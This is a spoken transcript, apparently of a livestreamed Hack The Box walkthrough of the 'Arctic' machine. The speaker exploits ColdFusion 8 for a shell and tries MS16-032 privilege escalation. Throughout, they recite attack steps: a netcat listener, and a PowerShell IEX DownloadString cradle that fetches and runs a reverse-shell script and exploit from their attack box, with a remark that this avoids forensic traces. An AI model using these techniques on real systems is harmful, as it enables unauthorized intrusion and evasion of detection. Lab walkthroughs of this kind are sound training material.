Alright, I am back and the scan has completed. So we did just scan most common ports. All we got back was 135, 8500, 49154. Looks like we're running RPC and then FMTP possibly. Who knows what that is. We'll try to... Let's run a full scan. And then we'll go down here. And we'll do something. We could do something here. I was gonna do some manual probing. 10, 10, 10, 11. On 8500. See what's going on here. Oh, nothing. Okay. I don't know what FMTP is. We'll try connecting with this. Okay. Hello. Weird. We'll see what's running on this port. Macro media. It's been a long time since I've heard that. Macromedia Cold Fusion. Oh, okay. So it's like a web server, possibly. 10, 10, 10, 11, 8500. Maybe? Do I need to specify? Yeah, it's even showing up in my history here, so I've been on here before. This ends up being Cold Fusion server. And if I remember right, somewhere in here we'll find version disclosure. And then I think it's just vulnerable to something. It's taking forever to load though. What the heck is going on with this machine? It's almost like it's still trying to boot up. Chugging along slowly. It's not very often you see a Windows host with 445 not open. At least doing these challenges and stuff. So we finally got CF docs. Doc.home.html is the only one I've clicked on before. So let's see what that is. And then in here we have scripts. Application.cfm administrator, I think is password protected. Scripts. God, everything we do is just taking forever to load on this. What's going on? Honestly, we should probably be sending this stuff through Burp Suite to get like a cache of it, but I wonder if we're going to be better off. So that is all the ports. Can we do like a script scan directly at, we're gonna call this one Cold Fusion, port 8500, no ping. We want to do a version scan. We also want to do a script scan. Cold Fusion 8. Alright, so we know that we're using Cold Fusion 8. And we have Cold Fusion in here. Cold Fusion Server 8. Administrator, enter CFM. It looks like we have some... Here we go. Remote command execution on Cold Fusion 8. Let's give that a shot. 5,557. Search exploit 557. Let's take a look at that guy and see what's going on. Cold Fusion 8. Looks like we're gonna do some imports first. This is a class, yep. Execute payload, listen connection. So first we're gonna give it lhost, which is me, and look at that. I'm not even gonna have to modify this at all. It's like I wrote this. So this is my IP address on Hack the Box, and that's the right port. That's the right host. 8500 is also the right port. So we don't need to modify this at all. We can just fire it off, it looks like. I wonder, I might need a listener running though. We'll wait and see. And we have a shell as Talus. Go to desktop. And we found the user flag there. I'm not even going to type it out. Let's see what other users are on this box. We have Tolus, guest, and administrator. So now we need to escalate privileges. Let's see. I wonder if I am an admin. Tolis is a user, not an admin. So this is where things will get kind of interesting because I'm not too great with Windows privilege escalation. We'll throw WinPs at it, see what happens. Windows Server 2008, and doesn't look like there's any hotfixes. So we might be able to just exploit this with some out-of-the-box kernel exploit. Let's take a look. MS16032. So we could use this one. Let's read a little bit about it. Microsoft Security Bulletin MS16032 important. Security update for secondary logon to address elevation of privileges. Execution summary. This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow an elevation of privileges if the Windows secondary logon service fails to properly manage request handles in memory. The security update is rated important for all supported editions of Windows. For more information, see affected software. Could run arbitrary code as an administrator. An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log onto the system, which we've done. An attacker could then run specifically crafted application that could exploit vulnerability and take control of affected system. The security update addresses vulnerability by correcting how Windows manages the handles in memory. So it seems pretty straightforward. And I think we might have a pre-compiled version we could use. What are we looking for? MS16032. So it looks like there's an option in MSF, but we just want to use the PowerShell. So let's go CD to 64. Oh no, PowerShell script's sitting right in front of my face. Let's run our Python web server And then we'll do... Well, I suppose I better look at the code here before we just go firing it away. PowerShell implementation. Targets vulnerable operating system support PowerShell v2+. In order for the race condition to succeed, the machine must have 2+ CPU cores. Ooh. Looks like we have 1 core. We could try anyway. Might not work. So we just need to execute this, and I'm gonna copy the command. Well, here's what we're gonna do. I don't want to modify this in place, so I'm gonna copy opt Windows kernel exploits MS 16032. We're going to copy that here, and then we'll make some changes to that. We're just going to put the command at the bottom. And then we'll start our PowerShell, our Python web server, and then we'll do IEX. First we need to get into PowerShell. Don't kill my shell, please. Be nice. Oh, it's gonna kill my shell. We have an executable we could possibly just copy over and run. Let's try that. Although we weren't able to run WinPeas as an executable, so I guess maybe we're not going to be able to do this one either, but let's give it a shot. Who knows? And then we'll cd to C users, Tolus, desktop. Okay, we're gonna do copy that over. So it looks like it didn't work. Try it one more time. So this time it says created elevated process. But I'm still Tolus. Is it creating... Oh my gosh. It's probably like spawning command shell in a different window. That's not good. Well, what are our other options? You know, we don't need to stick and try to do this exploit. We could move on to something different. OSCP cheat sheet. Could take a look at this one. I don't know that this is going to be too helpful, actually. Not really seeing anything useful in here. It's kind of just like a guide for enumeration. We have some precompiled exploits, which I think I'm using this one here, SecWiki precompiled exploits. Not being updated. Well, we could try to get the PowerShell module to work, or we could move on and find a different vector, possibly. Here's another good one, common exploits. So we'll take a look at this one. That's the one we were already looking at. Take a look at this one here. Windows kernel mode driver could allow elevation of privileges. MS15008. Systems that are running Windows Server 2008, 2008 R2, or 2012, or 2012 R2 affected if desktop experience feature is installed. It's hard to say. Systems will not be offered the update if desktop experience feature is not installed. I guess we could see if we have a compiled exploit for this. We do not. No exploits for this. So we'll move on to a different thing. You know, it kind of looks like MS16032, which is the one we were trying to use, is going to be our winner here. We have a link to exploit database. Let's check that out. This is exactly the code we were looking at. So we need to somehow get a PowerShell session. And we might be able to do that with, let's see, copy opt, invoke PowerShell TCP. Ooh. We're going to copy that to here. And then we'll put some command in here at the end. We'll update this to match our situation. We're going to want to do 10.10.16.4, and then we'll use 4.4.3 this time. We'll save it as script.ps1, and then we'll start our Python web server here. We'll get a listener, RL wrap, netcat, nvlp, 4.4.3. We'll do PowerShell command, IEX, new object. Is it net.web client, I think? Dot download string, HTTP 10.10.16.4, port 80, script.ps1. And then I guess we just pray that it works. So far, so good. There's our PowerShell session. now we want to do a very similar thing. In case you're wondering, I don't think this is the Nishang version of the script. Maybe it is, but I'm using... Oh. Maybe it is the Nishang version of it. I thought I was using a custom version or something that was packaged with Kali, but maybe not. That's probably the Nishang version of that. Anywho, we have a PowerShell. We need to run the exploit now, and we have not copied it down. We do have this version of it, so we can just do that. Let's start our Python web server again, and we're basically going to enter this command verbatim, but there's going to be one change we'll have to make. Oops, what did I do? Copy selection, we'll paste it here. We do need to change the name of the script because we want ms16.032.ps1. Okay, I don't quite understand what's going on here because it says I have a system shell, but I don't have a system shell. Did I have to run this in command prompt? So for some reason we're getting a system shell. It's working. It's just not letting us use the system shell. And I think it might be because we're in a PowerShell session. I wonder if we can use locate ms16.032. So looks like we use this on Optimum as well. I wonder if there's any difference in that. Diff this one against this one. We'll see what changes were made. Oh, what? Let's try this. Ah. So there is a difference. And it's this line here at the end where there's a command. So let's take a look at the source code again. And there should be like usage instructions. Is there a command? So I can't remember where the heck this came from, but I'm remembering that there are two different versions of this. One of them was modified, and I want to say it was in Empire. PowerShell Empire. Go to Empire. Server. I have no idea where it would be. PowerShell. No idea. But I'm pretty sure there was a second copy of this floating around somewhere. We'll just locate that. And then we're just going to use the one that I used for Optimum. We'll just make a copy of it. So here's where we enter in the command, and then we can basically pull our shell that we had, and this will allow us to so we're going to be executing the exploit. It'll get a system shell, and once it gets a system shell, it's going to run this command. So this command is going to reach out to the attack box on port 80 and grab shell.ps1, which is our TCP, our PowerShell, invoke PowerShell TCP from Lishang. So I think we just need a couple of listeners. We'll just kill this, and we'll start a listener on 443. So that's going to be to catch. That'll be to catch our admin shell, and then here we'll do PowerShell command IEX. New object web dot net dot web client download string HTTP 10.16.4.80. This time we'll be getting MS 16.032.ps1. So this should launch the exploit, and then we'll see the script get pulled down. So if we watch right here, we should see this pull down, and then this pull down, and then an admin shell spawn here. So there's the first one. Now it should pull shell. For some reason, it's not pulling shell. What's going on? Okay, it pulled MS16032. It's not running the command. So I'm gonna check out Optimum, make sure we have the right one. Oh. This is the, okay, we've copied the wrong one, I think. So let's look at this one, and then we'll search for command. So this, okay, this is the correct copy of it, and the reason I wasn't finding it is because there's no dash in the name. So let's go back to Arctic, and then we'll get rid of that. MS16032, and we'll locate, invoke MS16032. So it is in PowerShell Empire server data module source privesk invoke MS0. So this is a modified version. The initial script was from that EDB 39719, but then the makers of PowerShell Empire added that command tick to it so we can execute commands. So let's copy that instead. User share PowerShell Empire server. We were pretty close. Data module source privesk invoke ms16032, copy it here. And then we'll go down to the bottom, and that's where we're going to want to call our command. So I actually want to... Why is this not working for me? How do you get to the frickin' top? So here's an example, but they never added a flag. I remember watching this in, I think it was an IPSec video, maybe some other video. But whoever made the video was talking about how this is a modified version, yada yada, basically everything I just said. There is a dash in the function name. So now we'll go down to the bottom, and then we can do command IEX. We'll want to make sure to use PowerShell, IEX, new object, net.web client, download string, HTTP, 10.10.16.4, port 80, script.ps1. We're going to have to use single quotes there. Oh, I'll be out in a couple minutes to eat. What's going on? What did I do? So we'll put a single quote here. We'll end it with single quotes, end it with double quotes. Should be good. Alright, let's get back to it. So this time we're going to cancel. We'll run the exploit again. And my music disappeared. Let's get the music working again. After we finish this box, I'm going to be going to eat some dinner. So let's see what's going on. Ooh, this doesn't sound like free music. I don't want to get banned. Let's go to NCS. Hey, it's the same one we just listened to. That's all good. Alright, now we should be able to run PowerShell, IEX, new command IEX, new object. So if you're watching this and you haven't done a ton of pen testing or a ton of like capture the flag stuff, this command I'm typing right now, you'll want to memorize this. You're going to need it. You probably only ever use it on Windows boxes, but it's worth remembering it. It's a pretty neat little way to just grab a PowerShell script, load it into memory, and start using it. So normally you would have to drop a file on disk, but then you're obviously leaving stuff behind for forensics. This is a way to just, you're loading it directly into memory, and the function doesn't touch disk at all. So new object, net.web client, download string, http://10.10.16.4 port 80. We're looking for invoke ms16032 with no dash.ps1 and then end quotes. So now we should see it pull shell after it does this, or pull script.ps1. As long as everything is all good. So far it doesn't look like it's all good. did we do here? Seems okay. It should work. Maybe it's just taking a minute. Who knows? Kind of seems like it's not doing anything. Yep. So we definitely messed something up. And a little bit of troubleshooting. We didn't mess the command up because it reached out and it got our script. So that seems to be where it stopped. I would assume there's something wrong with this. So this should pull it down, load it into memory, and allow us to run a command. So we're calling the function invoke ms16032. That is the name of this function. Modifications by Mike Bennick. Something's wrong here. Command PowerShell, IEX, new object. I wonder if we... No, this seems right. PowerShell, IEX, new object. Let's check against... we'll do tail, invoke, S16. And then we'll compare that. We probably just needed the last two lines, to be honest. And then we'll do the same for completed optimum. So the only difference here, well, I'll be damned. We're not calling the function correctly. And then we explicitly call out PowerShell here where we didn't there. I could have swore the function name was still with a dash. Let's do head. Because this is a copy of that, so it should be the same. Oh, did I copy it, but it never actually copied? That could be possible. I'm so confused right now. Yeah, it's like it's not a copy of it. So what I'm gonna do is... Oh, because we didn't copy directly from there. We copied from the PowerShell Empire folder. That's weird. I could have swore I pulled this other one from PowerShell Empire too, but maybe not. So let's do copy, completed, optimum, invoke. We'll just copy that. And then we should just be able to use it as is. We're getting shell.ps1. I guess we need to get script.ps1. So probably the quickest solution is to move script to shell.ps1. And then we'll do it that way. And we'll just copy paste this command here. Okay. so far so good. We have a system shell. It should pull down our shell.ps1 now. It's still not doing it though. Wonder if we need to explicitly call out PowerShell, get that running, and then we'll hop down here and fix our exploit. We'll go down to the bottom, and then we'll just add PowerShell. Give that a try. Alright, we'll try this again. We're going to run this command essentially, but it'll be PowerShell command IEX new object net.web client download string HTTP 10.10.16.4 port 80, not shell. We want invoke ms16032.ps1. Why are you not following the rest? Do the rest of it. What's going on? Hard machine. Hi ZP977. It's not too hard of a machine. It's one that I've done before. I just can't seem to get this exploit to work. So we're at privilege escalation right now. We've identified that MS16032 is the way to go. Let's see. MS16032 command. Invoke. Make sure that it has command in it. Okay, we're just going to copy from here now. We'll just grab it all. Let's open raw actually. And then we'll do wget and then we'll copy opt invoke PowerShell TCP1, not that one. Invoke MS16032. We're going to copy here. Then we'll open it up. And we know we need to run this. And 10.16.4 port 80, and we're looking for shell.ps1, and then just to be sure, I'll cd to hack the box Arctic, and we'll do cat invoke ms16031 grep function. So there is no dash in the function name. Looks like we've done it correctly. And then we should be able to execute it. Once again, we gotta kill that, start a new shell. We got our shell back. So we're gonna run PowerShell command IEX new object net web client download string HTTP 10.10.16.4 port 80. And we want invoke ms16032.ps1. So this should work. Fingers crossed. Okay, now git shell. I'm gonna let this sit for a while. We'll see if it works. I feel like it would happen right away if it was gonna work, but I guess we'll find out. So instead of sitting around and waiting for this, we're just going to let it sit like this. I'm going to kill the stream for a minute here. I'm going to go eat some dinner, spend some time with my family, help put my kids to bed, and then I'll hop back on. So I should be back in about an hour, maybe a little bit less. And we'll see you guys there.